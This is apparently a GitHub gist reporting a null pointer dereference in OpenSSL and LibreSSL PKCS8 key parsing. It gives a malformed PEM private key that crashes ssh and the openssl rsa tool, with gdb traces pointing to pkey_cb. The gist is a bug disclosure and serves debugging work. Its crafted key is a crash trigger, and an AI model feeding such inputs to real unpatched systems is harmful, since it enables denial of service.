Created
April 10, 2015 04:37
-
-
Save fmunozs/a26d22ee4ca7196e828d to your computer and use it in GitHub Desktop.
OpenSSL / LibreSSL null dereference
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
OpenSSL Null pointer Dereference | |
================================= | |
I *think* anything below 1.0.2 is affected. I didn't have time to report it | |
but noticed that the last update doesn't crash anymore, so I guess one of | |
the recently fixed CVE's fixed this too [1]. | |
[1] https://www.openssl.org/news/secadv_20150319.txt | |
(old) Openssl on OSX | |
==================== | |
$ cat fuck.key | |
-----BEGIN PRIVATE KEY----- | |
MIIEvgIBADANBgkqhkiG9w0BAQEFAASKBKgwggSkAgEAAoIBAQDATDHcRCvHOxmy | |
eSmnNjIIyc7dEsrjNMVSHIwMuW+aUKp8YWi4t0RqZ4iHVqtK6kZ9guuIf95MsGRq | |
mqgG8cQd8SUU2Tb4F7ex6jETQMfxPw24Owz4vvk1PvWYHv8V6vbWY2pio3VzLKdA | |
XwWJ0mB3b8FiwWrXhEKmHdv6uViErIeAbfoTVhEaTXFyOCRBJFpUTLWVImojQMGe | |
I88bqOpJ12alpQLXKuhA8//DJUz1CV44hQfzXEEW0OJpnpgPNHwgi+cYrBqruHv2 | |
BwDek50xduZQX27An9OYfbXGsRKXVxc6tyK+hD+L3I1IT0XjDkrPsXV+me0jG874 | |
8l9CJqZJAgMBAAECggEAWx/AQPDNDgwjkT95TZORAjkfngNZwXEwUEjW1PDKwgWX | |
xHkkduPht8p4GCop4cZCwRdZJcXyQcUU0K+ZEDFhDg9H0ylbsxUKJ3Ui7Ey2csu+ | |
ZJ8W9okI7wJ2vy9xEaHWdqGFuFhdP8bZOtfMeBMJQ4/hxDqDtr0mGDHuHFHYcIW+ | |
+RaaxAUmINKJ/K/yru0uOwDmmVSTT7sIQMGVqZhEFXDbFEFVxLgJ7Gk5VDUdiYEv | |
eBdJFPEXGJr/Mg64/A2jBT2RRFEDLB5JevFuV0T3GPS4NzTlLaADGf9gGfmyBO6X | |
4beQ9MT9o+WCTVJtFnbAkuk5V5p3+khNfXYq7gRdQQKBgQDnVovh7+W0ZFoGA8Lk | |
/t0q6JVBiIosnnAJlHiiFL8OlaRsWxKDfEoB2Cp8jQN1c9r1Y1EA3tefxAR+PcSy | |
QFj0gT0mATk5WI74jjAUomouwk4kKD8Hmz9NBrIC2Lecf287a9A34AW9oOZK6Eet | |
VLQ/CUzJzLWJ8wEfXv8sIjvUgwKBgQDUzDHbP8vPidPwx4jFqjWJCf4iMUzTkzR+ | |
kW9gX0wiz9sAlHXtK4w8wte1nWpeC2nRekZZzog5UEZ1NaDUcQdTPOmKV2WhHiFK | |
OIhfCkel2HFJ5+tpoZNMMPeqzqK1ztVJzXStkfLQtxpYpC2gZW8XK3kDQ3fYRIuF | |
N4eB9ftYQwKBgQCQlJ+CCouWTW2R+sHQmpShX5EAzxQERNUit58ZNTwfIlkLu3N7 | |
p68dLfuHsh3qRwkeef7DO4KpgDmKqJIJEXxG+4q6+OLJu1ZHc54LF2KjbJ6nrFuQ | |
Jm/OdRPGAannbiGXko8kjKcp16h2QmuhoaGxD9/k80K2P6CA+b8i1xZrfwKBgF7K | |
32K1lorK8PiPSiQTYGm9Y9HDeF+/cWD4VE7v5LCVOw+VErsl7QCcIw8qIlnmZ6sC | |
9xfGYvR1CA3qZ8x61TKFLduMdx9Alr/DUyxTHfuI4V50y29wpHcKUSlrhxvKGUUZ | |
GuK+4xWKm1flOtX6mXQOz4depKJYVnZveBOyidaVAoGBAJcI1K8QIg2owNuWmE+Y | |
YeUa8OHvXhaPmErcWZqXAPzf1LWI3wmd7j9wzj8g7nZz8eTwAZUNUw4xbzMBF+Hb | |
d+/2XrEcQMEe+jeWhGMZPsZ8DFUTan1jA9StZN6ngHAaRs7P47o/+1As5AOJioyt | |
9zeQErFpG8e3F4WpsawsM+Dh | |
-----END PRIVATE KEY----- | |
$ gdb ssh | |
GNU gdb 6.3.50-20050815 (Apple version gdb-1824) (Wed Feb 6 22:51:23 UTC 2013) | |
.. | |
(gdb) run -i fuck.key root@localhost | |
Starting program: /usr/bin/ssh -i fuck.key root@localhost | |
Reading symbols for shared libraries ..... done | |
... | |
Program received signal EXC_BAD_ACCESS, Could not access memory. | |
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000008 | |
0x00007fff81bd8770 in pkey_cb () | |
LibreSSL +debug info | |
====================== | |
[fmunozs@hydra libressl-2.1.1]$ LD_LIBRARY_PATH=ssl/.libs/:crypto/.libs/ gdb ./apps/.libs/openssl | |
GNU gdb (GDB) 7.9 | |
Copyright (C) 2015 Free Software Foundation, Inc. | |
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> | |
This is free software: you are free to change and redistribute it. | |
There is NO WARRANTY, to the extent permitted by law. Type "show copying" | |
and "show warranty" for details. | |
This GDB was configured as "x86_64-unknown-linux-gnu". | |
Type "show configuration" for configuration details. | |
For bug reporting instructions, please see: | |
<http://www.gnu.org/software/gdb/bugs/>. | |
Find the GDB manual and other documentation resources online at: | |
<http://www.gnu.org/software/gdb/documentation/>. | |
For help, type "help". | |
Type "apropos word" to search for commands related to "word"... | |
Reading symbols from ./apps/.libs/openssl...done. | |
(gdb) run rsa -in fuck.key -check | |
Starting program: /home/fmunozs/libressl/src/libressl-2.1.1/apps/.libs/openssl rsa -in fuck.key -check | |
Program received signal SIGSEGV, Segmentation fault. | |
0x00007ffff78499b7 in pkey_cb (operation=2, pval=0x7fffffffda78, it=0x7ffff7b559c0 <PKCS8_PRIV_KEY_INFO_it>, exarg=0x0) at asn1/p8_pkey.c:72 | |
72 if (key->pkey->value.octet_string) | |
(gdb) print key | |
$1 = (PKCS8_PRIV_KEY_INFO *) 0x690a30 | |
(gdb) print key->pkey | |
$2 = (ASN1_TYPE *) 0x0 | |
(gdb) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment